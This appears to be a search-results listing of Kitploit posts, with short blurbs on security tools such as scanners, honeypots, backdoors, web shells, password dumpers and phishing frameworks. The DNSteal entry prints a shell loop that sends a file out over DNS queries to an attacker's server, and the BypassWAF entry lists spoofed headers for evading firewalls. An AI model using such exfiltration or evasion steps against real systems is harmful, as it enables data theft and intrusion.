Lucene search
K
KitploitMost viewed

6011 matches found

Kitploit
Kitploit
added 2018/07/05 9:54 p.m.27 views

TP-Link-defaults - Python Script For Trying Default Passwords For Some TP-Link Hotspots

Python script for trying default passwords for some TP-Link Hotspots Inspired by Usage usage: scan.py -h -p Python script for trying default passwords for some TP-Link Hotspots optional arguments: -h, --help show this help message and exit -p, --print-all print all found ssid's FOR EDUCATIONAL US...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2018/06/09 10:30 p.m.27 views

Hash-Buster v2.0 - Tool Which Uses Several APIs To Perform Hash Lookups

Features Automatic hash type identification Supports MD5, SHA1, SHA2 Can extract & crack hashes from a file Can find hashes from a directory, recursively 6 robust APIs As powerful as Hulk, as intelligent as Bruce Banner Single Hash You don't need to specify the hash type. Hash Buster will identif...

7AI score
Exploits0References1
Kitploit
Kitploit
added 2018/06/06 2:7 p.m.27 views

DumpsterDiver - Tool To Search Secrets In Various Filetypes

DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secret keys e.g. AWS Access Key, Azure Share Key or SSH keys. Additionally, it allows creating a simple search rules with basic conditions e.g. reports only csv file including at least 10 email...

7.1AI score
Exploits0References1
Kitploit
Kitploit
added 2018/05/15 10:5 p.m.27 views

Honeybits - A Simple Tool Designed To Enhance The Effectiveness Of Your Traps By Spreading Breadcrumbs & Honeytokens Across Your Systems

A simple tool designed to enhance the effectiveness of your traps by spreading breadcrumbs & honeytokens across your production servers and workstations to lure the attacker toward your honeypots. Author: Adel "0x4D31" Karimi. Background The problem with the traditional implementation of honeypot...

7.4AI score
Exploits0References3
Kitploit
Kitploit
added 2018/05/12 12:43 p.m.27 views

Whonow - A "Malicious" DNS Server For Executing DNS Rebinding Attacks On The Fly (Public Instance Running On Rebind.Network:53)

A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves. respond to DNS queries for this domain with 52.23.194.42 the first time it is requested and then 192.168.1.1 every time after...

6.8AI score
Exploits0References2
Kitploit
Kitploit
added 2018/05/07 9:50 p.m.27 views

Wordpress Exploit Framework v1.9.2 - Framework For Developing And Using Modules Which Aid In The Penetration Testing Of WordPress Powered Websites And Systems

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. What do I need to run it? Ensure that you have Ruby = 2.4.3 installed on your system and then install all required dependencies by opening a command prompt / terminal ...

8.2AI score
Exploits0References3
Kitploit
Kitploit
added 2018/04/13 12:41 p.m.27 views

JShielder - Automates The Process Of Installing All The Necessary Packages To Host A Web Application And Hardening A Linux Server

JSHielder is an Open Source tool developed to help SysAdmin and developers secure there Linux Servers in which they will be deploying any web application or services. This tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server wi...

8AI score
Exploits0References2
Kitploit
Kitploit
added 2018/02/16 9:14 p.m.27 views

Altdns - Generates permutations, alterations and mutations of subdomains and then resolves them

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain such as test, dev, staging as well as takes in a list of subdomains that you know of. From these two lists that are provided as...

7.2AI score
Exploits0References1
Kitploit
Kitploit
added 2018/02/07 1:0 p.m.27 views

Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy

Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers although probably also useful for sysadmins which sifts through the usually very noisy XML output from the Get-GPOReport cmdlet part of Microsoft's Group Policy module and identifies all the settings defined in...

6.6AI score
Exploits0References1
Kitploit
Kitploit
added 2018/01/08 1:16 a.m.27 views

Meltdown Exploit PoC

Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache. Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/meltdown.pdf. Can only dump linuxprocbanner at the moment, since requires accessed memory to be in...

7.4AI score
Exploits0References2
Kitploit
Kitploit
added 2017/12/23 9:7 p.m.27 views

certstreamcatcher - Catching phishing by observing certificate transparency logs

Catching phishing by observing certificate transparency logs. This tool is based on regex with effective standards for detecting phishing sites in real time using certstream. Installation $ cd /opt/ $ git clone https://github.com/6IX7ine/certstreamcatcher.git $ cd certstreamcatcher $ npm install...

7.5AI score
Exploits0References2
Kitploit
Kitploit
added 2017/10/11 12:56 p.m.27 views

Breacher - Tool To Find Admin Login Pages And EAR Vulnerabilites

A script to find admin login pages and EAR vulnerabilites. Features Multi-threading on demand Big path list 798 paths Supports php, asp and html extensions Checks for potential EAR vulnerabilites Checks for robots.txt Support for custom patns Usages Check all paths with php extension python...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2017/10/06 1:30 p.m.27 views

TorWall - Transparent Tor for Windows

Tallow is a small program that redirects all outbound traffic from a Windows machine via the Tor anonymity network. Any traffic that cannot be handled by Tor, e.g. UDP, is blocked. Tallow also intercepts and handles DNS requests preventing potential leaks. Tallow has several applications,...

7.1AI score
Exploits0References1
Kitploit
Kitploit
added 2017/09/05 1:31 p.m.27 views

Python Taint - A Static Analysis Tool for Detecting Security Vulnerabilities in Python Web Applications

Static analysis of Python web applications based on theoretical foundations Control flow graphs, fixed point, dataflow analysis Features Detect Command injection Detect SQL injection Detect XSS Detect directory traversal Get a control flow graph Get a def-use and/or a use-def chain Search GitHub...

7.9AI score
Exploits0References2
Kitploit
Kitploit
added 2017/07/31 10:12 p.m.27 views

CookieCatcher - Tool to assist in the exploitation of XSS

CookieCatcher is an open source application which was created to assist in the exploitation of XSS Cross Site Scripting vulnerabilities within web applications to steal user session IDs aka Session Hijacking. The use of this application is purely educational and should not be used without proper...

6.5AI score
Exploits0References1
Kitploit
Kitploit
added 2017/07/18 2:30 p.m.27 views

SET v7.7 - The Social-Engineer Toolkit “Blackout”

The Social-Engineer Toolkit SET was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two...

7.9AI score
Exploits0References1
Kitploit
Kitploit
added 2017/03/30 2:35 p.m.27 views

Radio Hack Box - Tool to Demonstrate Vulnerabilities in Wireless Input Devices

The SySS Radio Hack Box is a proof-of-concept software tool to demonstrate the replay and keystroke injection vulnerabilities of the wireless keyboard Cherry B.Unlimited AES. Requirements Raspberry Pi Raspberry Pi Radio Hack Box shield a LCD, some LEDs, and some buttons nRF24LU1+ USB radio dongle...

7.7AI score
Exploits0References2
Kitploit
Kitploit
added 2017/01/26 3:28 p.m.27 views

FiercePhish - A Full-Fledged Phishing Framework To Manage All Phishing Engagements

FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. The features will continue to be expanded and will include website spoofing, click tracking, and extensive notificati...

6.9AI score
Exploits0References7
Kitploit
Kitploit
added 2016/11/13 1:34 p.m.27 views

PsTools - Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more

The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more. Introduction The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that...

7.1AI score
Exploits0
Kitploit
Kitploit
added 2016/11/10 1:53 p.m.27 views

hget - Rocket Fast, Interruptable, Resumable Download Accelerator

Rocket fast download accelerator written in golang. Current program working in unix system only. NOTE : hget is currently on highly development, its usage, architecture and code may change anytime at the future. It would be great if you can contribute whatever features that you want to use, I wil...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2016/09/14 2:38 p.m.27 views

Cartero - Social Engineering Framework

A robust Phishing Framework with a full featured CLI interface. The project was born out necessity through of years of engagements with tools that just didn't do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and...

6.6AI score
Exploits0References1
Kitploit
Kitploit
added 2016/08/31 2:30 p.m.27 views

sshhipot - High-Interaction MitM SSH Honeypot

High-interaction SSH honeypot ok, it's really a logging ssh proxy. Still more or less a work-in-progress. Feel free to go install this repository if you'd like to try it. Run it with -h to see more options. In particular, logging is kinda rough. One of these days there'll be better documentation,...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2016/07/05 11:44 p.m.27 views

Fierce - A DNS Reconnaissance Tool for Locating Non-Contiguous IP Space

First, credit where credit is due, fierce was originally written by RSnake along with others at http://ha.ckers.org/ . This is simply a conversion to Python 3 to simplify and modernize the codebase. The original description was very apt, so I'll include it here: Fierce is a semi-lightweight scann...

7.2AI score
Exploits0References1
Kitploit
Kitploit
added 2016/06/20 11:5 p.m.27 views

lisa.py - An Exploit Dev Swiss Army Knife

lisa.py An Exploit Dev Swiss Army Knife. Installation Copy lisa.py and .lldbinit to / Use the following commands: ant4g0nist$ cp lisa.py /lisa.py ant4g0nist$ cp lldbinit /.lldbinit ant4g0nist$ lldb lllllll iiii l:::::l i::::i l:::::l iiii l:::::l l::::l iiiiiii ssssssssss aaaaaaaaaaaaa l::::l...

7.4AI score
Exploits0References1
Kitploit
Kitploit
added 2016/01/25 10:13 p.m.27 views

V3n0M-Scanner - Popular SQLi and Pentesting Scanner

V3n0M runs on Python3 Live Project - Readding old features back in and improved for Python3 v3n0m is a free and open source scanner. Evolved from baltazar's scanner, it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is fo...

8.6AI score
Exploits0References1
Kitploit
Kitploit
added 2015/12/17 10:19 p.m.27 views

credmap - The Credential Mapper

Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these. Help Menu Usage: credmap.py --email EMAIL | --user USER |...

7.5AI score
Exploits0References1
Kitploit
Kitploit
added 2015/12/02 10:41 p.m.27 views

Katana - Framework for Hackers, Professional Security and Developers

Katana is a framework written in python for making penetration testing, based on a simple and comprehensive structure for anyone to use, modify and share, the goal is to unify tools serve for professional when making a penetration test or simply as a routine tool, The current version is not...

7.8AI score
Exploits0References12
Kitploit
Kitploit
added 2015/11/18 9:37 p.m.27 views

GetHead - HTTP Header Analysis Vulnerability Tool

gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP Headers. Usage: $ python gethead.py http://domain.com Changelog Version 0.1 - Initial Release Written in Python 2.7.5 Performs HTTP Header Analysis Reports...

7.9AI score
Exploits0References2
Kitploit
Kitploit
added 2015/11/02 10:31 a.m.28 views

KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory

KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData% General Design KeeFarce uses DLL injection to execute code within the context of a runnin...

8.2AI score
Exploits0References3
Kitploit
Kitploit
added 2015/09/27 7:22 p.m.27 views

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...

7.2AI score
Exploits0References1
Kitploit
Kitploit
added 2015/09/09 8:43 p.m.27 views

Wfuzz - The Web Application Bruteforcer

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked directories, servlets, scripts, etc, bruteforce GET and POST parameters for checking different kind of injections SQL, XSS, LDAP,etc, bruteforce Forms parameters User/Password, Fuzzing,etc...

7.7AI score
Exploits0References1
Kitploit
Kitploit
added 2015/08/31 1:52 p.m.27 views

Empire - PowerShell Post-Exploitation Agent

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz,...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2015/06/17 10:23 p.m.27 views

Gcat - A stealthy Backdoor that uses Gmail as a command and control server

A stealthy Python based backdoor that uses Gmail as a command and control server. Setup For this to work you need: A Gmail account Use a dedicated account! Do not use your personal one! Turn on "Allow less secure apps" under the security settings of the account This repo contains two files: gcat....

8.1AI score
Exploits0References2
Kitploit
Kitploit
added 2015/06/16 8:2 p.m.27 views

Cupp - Common User Passwords Profiler

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the passwo...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2015/06/05 10:21 p.m.27 views

BypassWAF - Burp Plugin to Bypass Some WAF Devices

Add headers to all Burp requests to bypass some WAF products. This extension will automatically add the following headers to all requests. X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Usage Steps include: 1. Add extension to burp 2. Create...

7.4AI score
Exploits0References2
Kitploit
Kitploit
added 2015/03/19 12:20 a.m.27 views

BlueScreenView - Blue Screen of Death (STOP error) information in dump files

BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue...

6.9AI score
Exploits0
Kitploit
Kitploit
added 2015/01/28 9:25 p.m.27 views

DAws - Advanced Web Shell (Windows/Linux)

There's multiple things that makes DAws better than every Web Shell out there: 1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shellexec was disabled it would automatically use exec or passthru or...

0.5AI score
Exploits0References1
Kitploit
Kitploit
added 2015/01/12 11:28 p.m.27 views

Instant PDF Password Protector - Password Protect PDF file

Instant PDF Password Protector is the Free tool to quickly Password Protect PDF file on your system. With a click of button, you can lock or protect any of your sensitive/private PDF documents. You can also use any of the standard Encryption methods - RC4/AES 40-bit, 128-bit, 256-bit based upon t...

7.2AI score
Exploits0
Kitploit
Kitploit
added 2014/12/14 9:2 p.m.27 views

Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)

Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch. Features Support multiple packet processing threads Shared configuration and attribute table Use a...

7.3AI score
Exploits0
Kitploit
Kitploit
added 2014/12/09 1:6 a.m.27 views

THC-Hydra 8.1 - Network Logon Cracker

A very fast network logon cracker which support many different services. See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept...

7.6AI score
Exploits0
Kitploit
Kitploit
added 2014/06/06 6:45 p.m.27 views

sb0x-project - A simple and Lightweight framework for Penetration testing

sb0x-project is A Lightweight Framework for PenTesting Written in Python Platforms: Linux BSD "Or Unix System" Download sb0x...

7.4AI score
Exploits0References1
Kitploit
Kitploit
added 2014/06/02 8:52 p.m.27 views

Liffy - Local File Inclusion Exploitation Tool

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension call...

7.3AI score
Exploits0References1
Kitploit
Kitploit
added 2014/04/30 2:9 a.m.27 views

BlackArch Linux v2014.04.21 - Lightweight expansion to Arch Linux for pentesters and security researchers

BlackArch Linux is an Arch-based GNU/Linux distribution for pentesters and security researchers. The BlackArch package repository is compatible with existing Arch installs. Changelog v2014.04.21 added new system packages: mplayer, abs, ack, bc, bridge-utils, darkhttpd, flashplugin, inotify-tools,...

7.4AI score
Exploits0
Kitploit
Kitploit
added 2014/04/01 7:2 p.m.27 views

Linkedin Password Decryptor - Linkedin Password Recovery Software

Linkedin Password Decryptor is the all-in-one software to recover Linkedin passwords stored by popular Web Browsers. These days, most of the web browsers store the website login passwords to prevent hassale of entering the password again and again. Each web browser use their own encryption...

7.2AI score
Exploits0
Kitploit
Kitploit
added 2014/03/23 2:33 p.m.27 views

[SearchMyFiles] Alternative to 'Search For Files And Folders' module of Windows + Duplicates Search

SearchMyFiles is an alternative to the standard "Search For Files And Folders" module of Windows. It allows you to easily search files in your system by wildcard, by last modified/created/last accessed time, by file attributes, by file content text or binary search, and by the file size...

7.2AI score
Exploits0
Kitploit
Kitploit
added 2014/03/15 12:24 a.m.27 views

[wig] WebApp Information Gatherer (Identify CMS)

wig is a Python tool that identifies a websites CMS by searching for fingerprints of static files and extracting version numbers from known files. OS identification is done by using the value of the ‘server’ and ‘X-Powered-By’ in the response header. These values are compared to a database of whi...

7.2AI score
Exploits0References1
Kitploit
Kitploit
added 2014/02/15 11:33 p.m.27 views

[Browser Password Dump v2.0] Command-line Tool to Recover Login Password from Web Browsers

Browser Password Dump is the free command-line tool to instantly recover your lost password from all the popular web browsers. Currently it can recover stored web login passwords from following browsers. Firefox Internet Explorer Google Chrome Chrome Canary/SXS CoolNovo Browser Opera Browser Appl...

6.7AI score
Exploits0
Kitploit
Kitploit
added 2014/02/07 10:55 p.m.27 views

[Router Password Decryptor v2.0] Recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file

Router Password Decryptor is the FREE tool to instantly recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file. Currently it supports password recovery from following type of Routers/Modems Cisco Juniper DLink BSNL ...

7.4AI score
Exploits0
Kitploit
Kitploit
added 2014/01/14 4:39 a.m.27 views

[Xplico 1.1.0] Open Source Network Forensic Analysis Tool (NFAT)

The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email POP, IMAP, and SMTP protocols, all HTTP contents, each VoIP call SIP, FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is ...

7AI score
Exploits0
Kitploit
Kitploit
added 2013/12/05 2:15 a.m.27 views

[Wapiti 2.3.0] Web Application Vulnerability Scanner

Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti act...

7.9AI score
Exploits0
Total number of security vulnerabilities5000